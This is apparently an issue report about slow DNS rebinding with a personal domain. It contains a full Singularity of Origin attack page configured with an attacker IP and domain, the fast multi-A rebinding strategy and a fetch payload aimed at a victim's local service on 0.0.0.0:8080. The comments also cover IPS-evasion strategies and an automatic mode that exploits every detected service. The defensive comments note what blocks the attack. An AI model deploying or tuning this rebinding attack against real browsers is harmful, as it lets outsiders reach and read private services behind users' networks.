Open
Description
With my domain, rebinding takes 40s+ instead of under 5s as it does with your domain rebind.it.
my domain dynamic:
your domain rebind.it:
Both use the same settings:
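<!DOCTYPE html>
<html lang="en">
  <!--
    Sample Singularity of Origin page that drives a DNS rebinding attempt from
    the browser and, on success, dumps the fetched home page to the developer
    console. All options are described in more detail below.

    This copy does not scan a network: the script at the bottom calls
    app.attackTarget() for one fixed host and port ("0.0.0.0", "8080").

    Defender's view: the fetch only returns content when the local service
    answers a request whose Host header carries the external domain name.
    Services that check Host against an allow-list or require authentication,
    and resolvers that drop loopback/private answers for public names, do not
    yield a response to the rebound origin.
  -->
  <head>
    <!-- Declare the encoding before any script or text so the parser sees it first. -->
    <meta charset="utf-8">
    <!-- Turn off speculative DNS prefetching for this page. -->
    <meta http-equiv="x-dns-prefetch-control" content="off">
    <title>Singularity of Origin DNS Rebinding Automatic Attack</title>
    <!-- Expected to define the global `app` used by the inline script below. -->
    <script src="./manager-ori.js"></script>
    <!-- <script src=scan-manager.js></script> -->
  </head>
  <!-- The body starts hidden; presumably the manager script reveals it
       according to hideActivity (not visible on this page; confirm). -->
  <body id="body" style="display: none">
    <h3>Scanning Progress</h3>
    <div id="activity"></div>
    <h3>DNS Rebinding Progress</h3>
    <div id="attackframes"></div>
    <script>
      const configuration = {
        attackHostIPAddress: "145.79.12.144", // CHANGE THIS to your attacking server IP address.
        attackHostDomain: "dynamic.n2l.team", // CHANGE THIS to your attacker domain.

        /* Rebinding strategy section */
        // Select one strategy per target. The value set here is "ma"
        // (FromQueryMultiA); the other strategies are listed for reference.
        //
        // "FromQueryFirstThenSecond":
        //   Default, conservative. Use interval: "20" when choosing this strategy.
        // "FromQueryMultiA" ('ma'):
        //   Multiple DNS answers (fast).
        //   Rebinding in approximately 3 sec. Use interval: "1" when choosing this strategy.
        //   Works against localhost only, specifically:
        //   0.0.0.0 when target is Linux/macOS/Unix, and 127.0.0.1 when target is Windows based.
        // "FromQueryRoundRobin" ('rr'):
        //   Round robin. Slower. Use for IPS/filters evasion or when DNS requests arrive out of sync.
        // "FromQueryRandom" ('rd'):
        //   Random. Slower. Use for IPS/filters evasion or when DNS requests arrive out of sync.
        rebindingStrategy: "ma",
        /* Rebinding strategy section ends */

        // Choose one of Singularity's attack payloads to deliver to the victim host or write your own.
        // 'Simple Fetch Get' fetches the '/' page of the target and logs it to the console.
        attackPayload: "Simple Fetch Get",
        // 'automatic' will attempt to detect services and automatically exploit them
        // with all payloads available to Singularity!
        //attackPayload: 'automatic',

        // Interval in seconds between retries to detect a successful rebind.
        // Use "20" for all rebinding strategies except for "FromQueryMultiA", where "1" will work.
        interval: "1",

        // Attack using the Fetch API ('fetch'), or iframes ('iframe').
        // Fetch API works with most browsers, but is blocked by Chrome for most (but not all) target configurations.
        // Inline Frame should work with most browsers, unless the target application does not allow rendering in an iframe.
        attackMethod: "fetch",

        // Flush Chrome DNS browser cache to improve DNS rebinding speed.
        flushDns: false,

        // One of several tricks to determine whether the page is currently
        // resolving to the attacker or to the victim host: a marker string
        // looked for in the fetched index page.
        indexToken: "<!--thisismytesttoken-->",

        // Change the WebSockets / proxy port if you started Singularity with a different value.
        wsProxyPort: 3129,

        // Show a blank page or not.
        hideActivity: false,

        // Rebind a headless browser. Default is false.
        delayDOMLoad: false,
      };

      // Callback invoked when a frame reports a successful rebind.
      // `msg` is the frame message; this handler reads msg.origin and
      // msg.data.response and only logs them to the console.
      configuration.rebindingSuccessFn = (msg) => {
        console.log(
          `Iframe reports attack successful for ${msg.origin}\n${msg.data.response}`
        );
      };

      // Update the Singularity app configuration.
      app.getConfiguration().setManually(configuration);

      // Start against a single target: host "0.0.0.0", port "8080".
      // NOTE(review): the meaning of the third argument (true) is defined in
      // manager-ori.js and is not visible on this page.
      app.attackTarget("0.0.0.0", "8080", true);
    </script>
  </body>
</html>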